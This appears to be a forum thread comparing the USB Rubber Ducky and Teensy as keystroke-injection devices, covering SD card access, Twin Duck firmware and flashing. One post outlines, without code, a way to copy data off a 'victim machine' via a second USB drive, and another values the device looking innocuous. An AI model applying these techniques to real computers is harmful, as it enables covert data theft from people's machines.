Teensy's SD card shield was pretty good, but the SDFat Arduino lib was pretty unstable with Teensy in my experience, so I couldn't read or write bigger pieces of data. For that price, I hope ducky has it stable enough, if it does, then I might revive StealthStalker project just for this.
Another thing, do you HAVE to use ducky encoder and that ducky scripting language to program it? or can it be done with something else?
-
So this ducky has an SDCard slot, does it mean SD card can be used to access and write data?
Yes this is possible, like i mentioned in post above, by flashing "Twind Duck" -firmware in ducky. Quote from link i posted above:
The Ducky primarily acts as a USB Mass Storage Device, and on a click of the button will start emulating Keyboard
It seems that flashing firmware to ducky can be bit tricky. Haven't try myself, but read about it. Here is link to python script which should make it easier, if someone intrested:
https://forums.hak5.org/index.php?/topic/29281-release-ducky-flasher-v10/
Another thing, do you HAVE to use ducky encoder and that ducky scripting language to program it? or can it be done with something else?
As far as i know, yes you have to use those. But basically with twin duck you could write some more complex shell scripts in file and store them in duckys sdcard. Then just use ducky script to launch that script from the sdcard. I know it's not what you meant, but still.
-
Twin duck firmware is an option, but to be honest I'm scared to flash it and have a $40 paperweight. However with twin duck you have to have a delay script and wait for your ducky to be mounted.
@kulver
It comes with a 128mb microsd card which is where you store your inject.bin (your payload script) however unless you have the twin duck firmware flashed you won't be able to access it on the victim machine, only when taking the SD card out. An alternate method is a double usb, one usb the ducky, the other for storage, you plug in the storage device which is say given the name PLOAD, you can then write a script for ducky to look for the Drive titled PLOAD and once it does, execute copy, or whatever you want (storage/download. Twin duck however is a much better option for offline info gathering
-
Well that sucks. For 40euro I expected it to be able to access that damn SD card. Looks like teensy is a much better option to go with, +pins, +C/Arduino, +SDcard shield (tho a bit buggy).
-
Convenience vs Functionality, I'd hardly say the bare betal teensy is a "better deal" to someone who ONLY wants the capabilities of the Ducky, the ducky comes in a nicer case and has a whole scripting language built around the endgoal, emulating an HID. However if you want to use the teensy and have the know how to program it then fashion a case for it (even if that IS easy as fuck) then yeah get the teensy, it's jsut a matter of what your time is worth and what features you want.
-
Convenience vs Functionality, I'd hardly say the bare betal teensy is a "better deal" to someone who ONLY wants the capabilities of the Ducky, the ducky comes in a nicer case and has a whole scripting language built around the endgoal, emulating an HID. However if you want to use the teensy and have the know how to program it then fashion a case for it (even if that IS easy as fuck) then yeah get the teensy, it's jsut a matter of what your time is worth and what features you want.
Very true. Great valid points. All I wanted was the ducky specifically for emulating HID and that's what it does. I pull it out and it doesn't look weird, just like a usb.